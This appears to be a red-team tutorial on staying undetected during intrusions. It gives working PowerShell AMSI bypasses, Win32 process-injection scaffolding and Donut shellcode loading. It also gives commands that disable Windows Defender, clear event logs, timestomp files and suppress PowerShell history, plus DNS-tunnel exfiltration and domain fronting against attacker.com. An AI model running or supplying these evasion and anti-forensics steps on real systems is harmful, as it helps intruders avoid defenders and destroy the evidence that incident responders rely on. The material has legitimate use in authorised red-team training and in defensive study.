Covert Operations

Execution

The defining characteristic of red team operations is stealth. Avoiding detection requires meticulous OPSEC (Operational Security), anti-forensics, and understanding how defenders hunt for threats. Every action must be deliberate and calculated.

OPSEC Fundamentals

1. Assume Breach

Act as if the blue team knows you're there. Avoid obvious indicators like named beacons (BEACON-PC01) or well-known ports (4444, 5555).

2. Living Off the Land (LOLBins)

Use legitimate system binaries instead of bringing your own tools. Examples: certutil for downloads, mshta for execution, wmic for reconnaissance.

3. Blend with Normal Traffic

C2 beacons should mimic legitimate traffic patterns. Use HTTPS on port 443, vary beacon intervals (jitter), and match user activity hours.

4. Minimize Footprint

Don't drop files to disk. Use in-memory execution (PowerShell, .NET assemblies), fileless malware, and reflective DLL injection.

EDR/AV Evasion Techniques

evasion.ps1

powershell

# AMSI Bypass (Disable Windows Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Alternative AMSI bypass via memory patching
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

# Obfuscate PowerShell with Invoke-Obfuscation
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psd1
Invoke-Obfuscation

# Use process injection to avoid disk writes
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
Add-Type -MemberDefinition $code -Name "Win32" -Namespace Win32Functions

# Execute in-memory with Donut shellcode loader
donut -f payload.exe -o payload.bin
# Inject payload.bin into legitimate process

AMSI Bypass Limitations

Modern EDR solutions log AMSI bypass attempts. If you bypass AMSI, assume the SOC is alerted. Use sparingly and consider alternative evasion methods like obfuscation or indirect syscalls.

Covert C2 Communication

Domain Fronting

Hide C2 traffic behind legitimate CDN domains (Cloudflare, Azure CDN).

SNI: legit.cloudflare.com | Host: attacker.com

DNS Tunneling

Exfiltrate data via DNS queries. Slow but rarely blocked.

query: base64data.attacker.com

Malleable C2 Profiles

Customize Cobalt Strike beacons to mimic specific applications (OneDrive, Slack).

set useragent "OneDriveSync";

ICMP Tunneling

Embed C2 traffic in ping packets. Rarely inspected.

icmpsh, ptunnel

Anti-Forensics

anti-forensics.ps1

powershell

# Clear Windows Event Logs (generates event 1102 - log cleared)
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Delete specific events without clearing entire log
# Use Invoke-Phant0m to kill EventLog service thread
# https://github.com/hlldz/Invoke-Phant0m

# Timestomp files (modify creation/modification times)
# Use TimeStomp from Metasploit or PowerShell
(Get-Item file.txt).CreationTime = "01/01/2020 12:00:00"
(Get-Item file.txt).LastWriteTime = "01/01/2020 12:00:00"

# Disable Windows Defender (requires admin)
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableScriptScanning $true

# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Disable command logging
Set-PSReadlineOption -HistorySaveStyle SaveNothing

Event Log Clearing is Noisy

Clearing logs (Event ID 1102) is a high-fidelity IOC. Instead, selectively delete specific events or disable logging temporarily. Better: accept that logs will exist and focus on not triggering alerts in the first place.

Noise Discipline

Avoid these common mistakes that alert defenders:

Avoid: Nmap -A -p- scans (extremely noisy, triggers IDS)
Instead: Passive reconnaissance with packet sniffing, targeted port checks
Avoid: Metasploit default payloads (heavily signatured)
Instead: Custom payloads, obfuscated shellcode, or commercial frameworks
Avoid: Multiple failed login attempts (account lockout, alerts)
Instead: Password spraying with long delays, or use harvested credentials
Avoid: Running Mimikatz directly (instant EDR alert)
Instead: Reflective PE loading, indirect syscalls, or LSASS dumping alternatives